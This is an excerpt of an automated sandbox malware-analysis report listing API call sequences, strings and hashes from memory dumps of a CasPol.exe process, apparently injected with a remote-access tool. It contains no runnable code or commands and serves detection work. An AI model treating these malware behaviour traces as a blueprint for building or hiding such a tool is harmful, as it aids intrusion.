                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,0044338B,?,?,0044332B,?), ref: 0044340D
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                          • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                                                                                                                          • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                                                                                                                                                          • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                                                                                                                          • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B6C
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                          • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                                                          • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                                                                                                                                          • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                                                          • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                                                                                                                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00405140
                                                                                                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                                                                                          • String ID: KeepAlive | Disabled
                                                                                                                                                                          • API String ID: 2993684571-305739064
                                                                                                                                                                          • Opcode ID: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                                                                                                                                          • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                                                                                                                                                          • Opcode Fuzzy Hash: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                                                                                                                                          • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                                                                                                                                                          • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                                                                                                                                                          • Sleep.KERNEL32(00002710), ref: 0041AE98
                                                                                                                                                                          • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                                                                                          • String ID: Alarm triggered
                                                                                                                                                                          • API String ID: 614609389-2816303416
                                                                                                                                                                          • Opcode ID: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                                                                                                                                          • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                                                                                                                                                          • Opcode Fuzzy Hash: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                                                                                                                                          • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                                                                                                                                                          • GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CE00
                                                                                                                                                                          • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CE0D
                                                                                                                                                                          • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CE20
                                                                                                                                                                          Strings
                                                                                                                                                                          • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                                                                                          • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                                                                                          • API String ID: 3024135584-2418719853
                                                                                                                                                                          • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                                                                                                                          • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                                                                                                                                                          • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                                                                                                                          • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                                                                                                                                          • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                                                                                                                                                          • Opcode Fuzzy Hash: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                                                                                                                                          • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                                                                                                                                          • _free.LIBCMT ref: 0044943D
                                                                                                                                                                            • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                                          • _free.LIBCMT ref: 00449609
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1286116820-0
                                                                                                                                                                          • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                                                                                                                                          • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                                                                                                                                                                          • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                                                                                                                                          • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                                                                                            • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                                                                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                                                                                                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                                                                                                                                            • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,h]v), ref: 0041C08B
                                                                                                                                                                            • Part of subcall function 0041C076: IsWow64Process.KERNEL32(00000000,?,?,?,h]v), ref: 0041C096
                                                                                                                                                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                                                                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2180151492-0
                                                                                                                                                                          • Opcode ID: 5e635ca273bbaf4b6633853c1879682a44097072eebb318f7e766faded892b56
                                                                                                                                                                          • Instruction ID: 39de0d33b69ea9088fa68d935cf3ef43cf04ff0480c7130c1a021fac56d243da
                                                                                                                                                                          • Opcode Fuzzy Hash: 5e635ca273bbaf4b6633853c1879682a44097072eebb318f7e766faded892b56
                                                                                                                                                                          • Instruction Fuzzy Hash: 8D4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                          • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                                                                                                          • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                                                                                                                                                          • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                                                                                                          • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                                                                                                                                                          APIs
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00451231
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
                                                                                                                                                                          • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
                                                                                                                                                                          • __freea.LIBCMT ref: 0045129D
                                                                                                                                                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 313313983-0
                                                                                                                                                                          • Opcode ID: 505ad9812f568066b07f0fb8a09e4f725dd1d0495a5b090eb77152ea1c2fabb2
                                                                                                                                                                          • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                                                                                                                                                          • Opcode Fuzzy Hash: 505ad9812f568066b07f0fb8a09e4f725dd1d0495a5b090eb77152ea1c2fabb2
                                                                                                                                                                          • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                                                                                                                                                                            • Part of subcall function 00413733: RegQueryValueExA.KERNEL32 ref: 00413768
                                                                                                                                                                            • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                                                                                                                                          • Sleep.KERNEL32(00000BB8), ref: 004127B5
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseOpenQuerySleepValue
                                                                                                                                                                          • String ID: exepath$h]v$hev$xtv
                                                                                                                                                                          • API String ID: 4119054056-131525599
                                                                                                                                                                          • Opcode ID: b1c708b36fa724e52661caa0efcea8b4379a0a4ada5948ef7cbd54432e038acd
                                                                                                                                                                          • Instruction ID: 7f535f989f64e3217726da85717e45219a172cbdcd35e6ae3f2d68e0f7be43ad
                                                                                                                                                                          • Opcode Fuzzy Hash: b1c708b36fa724e52661caa0efcea8b4379a0a4ada5948ef7cbd54432e038acd
                                                                                                                                                                          • Instruction Fuzzy Hash: 1F21D8A1B043042BD604B7365D4AAAF724D8B80358F40897FBA56E73D3EEBD9C45826D
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                                                                                                                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                                                                                                                                                          • _free.LIBCMT ref: 0044F43F
                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 336800556-0
                                                                                                                                                                          • Opcode ID: bd5b513fc8b609e28947bb0fbcaa4a85653cdf481583ed06f966610d709b3706
                                                                                                                                                                          • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                                                                                                                                                          • Opcode Fuzzy Hash: bd5b513fc8b609e28947bb0fbcaa4a85653cdf481583ed06f966610d709b3706
                                                                                                                                                                          • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                                                                                                                            • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                                                                                                                          • _free.LIBCMT ref: 100071B8
                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 336800556-0
                                                                                                                                                                          • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                                                          • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                                                                                                                                          • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                                                          • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                                                                                                                          • _free.LIBCMT ref: 10005BB4
                                                                                                                                                                          • _free.LIBCMT ref: 10005BDB
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$_free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3170660625-0
                                                                                                                                                                          • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                                                          • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                                                                                                                          • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                                                          • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                                                          • lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                                                          • lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrlen$lstrcat
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 493641738-0
                                                                                                                                                                          • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                                                          • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                                                                                                                          • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                                                          • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                                                                                                                                          APIs
                                                                                                                                                                          • _free.LIBCMT ref: 00450A54
                                                                                                                                                                            • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                                          • _free.LIBCMT ref: 00450A66
                                                                                                                                                                          • _free.LIBCMT ref: 00450A78
                                                                                                                                                                          • _free.LIBCMT ref: 00450A8A
                                                                                                                                                                          • _free.LIBCMT ref: 00450A9C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
